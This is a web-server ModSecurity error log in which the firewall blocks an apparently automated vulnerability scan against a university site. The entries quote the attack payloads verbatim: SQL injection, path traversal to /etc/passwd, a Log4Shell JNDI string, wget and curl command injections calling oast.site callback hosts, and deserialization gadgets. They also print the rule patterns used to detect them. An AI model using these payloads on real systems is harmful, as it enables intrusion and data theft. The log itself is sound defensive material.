[Tue Aug 29 11:32:37.404479 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARIwJEAAAAO"]
[Tue Aug 29 11:32:38.385318 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARA7aYAAAAA"]
[Tue Aug 29 11:32:38.427774 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQ9H5YAAAAK"]
[Tue Aug 29 11:32:40.411660 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgwx89jdmtqssn5.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARH7JUAAAAM"]
[Tue Aug 29 11:32:42.479606 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARQ32AAAAAB"]
[Tue Aug 29 11:32:46.427030 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARNk6QAAAAS"]
[Tue Aug 29 11:32:47.535515 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARR224AAAAF"]
[Tue Aug 29 11:32:47.597482 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARD1QwAAAAH"]
[Tue Aug 29 11:32:49.409105 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARMMecAAAAR"]
[Tue Aug 29 11:32:49.524969 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAAQKOgAAAAAs"]
[Tue Aug 29 11:32:51.464117 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAQMr3oAAAAu"]
[Tue Aug 29 11:32:59.300983 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24QAAAAF"]
[Tue Aug 29 11:32:59.356183 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4gAAAAu"]
[Tue Aug 29 11:32:59.804540 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlg4kqiyi3qokhds.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARMMfQAAAAR"]
[Tue Aug 29 11:33:05.769528 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARNk8EAAAAS"]
[Tue Aug 29 11:33:09.408319 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARR25gAAAAF"]
[Tue Aug 29 11:33:11.330314 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARR26cAAAAF"]
[Tue Aug 29 11:33:12.063933 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/app"] [unique_id "ZO11CMCo-f0AAARA7eEAAAAA"]
[Tue Aug 29 11:33:12.517798 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARA7eIAAAAA"]
[Tue Aug 29 11:33:12.682704 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg1ph976q6dyc39.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg1ph976q6dyc39.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NoAAAAM"]
[Tue Aug 29 11:33:12.803116 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAANsAcwAAAAD"]
[Tue Aug 29 11:33:12.824830 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgg543c9r7gfcer.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgg543c9r7gfcer.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARR27MAAAAF"]
[Tue Aug 29 11:33:13.299365 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgjncrbepz6nizi.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjncrbepz6nizi.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARA7eUAAAAA"]
[Tue Aug 29 11:33:13.320041 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/app"] [unique_id "ZO11CcCo-f0AAARA7eYAAAAA"]
[Tue Aug 29 11:33:13.338518 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg79hexeth7nrxm.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg79hexeth7nrxm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARQ37EAAAAB"]
[Tue Aug 29 11:33:14.404276 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARTEMgAAAAG"]
[Tue Aug 29 11:33:14.460330 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARQ37QAAAAB"]
[Tue Aug 29 11:33:14.564036 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARQ37UAAAAB"]
[Tue Aug 29 11:33:18.428052 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg3nai7usny3fkf.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARo8wwAAAAT"]
[Tue Aug 29 11:33:18.756107 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgig7or3as5agwi.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmH8AAAAR"]
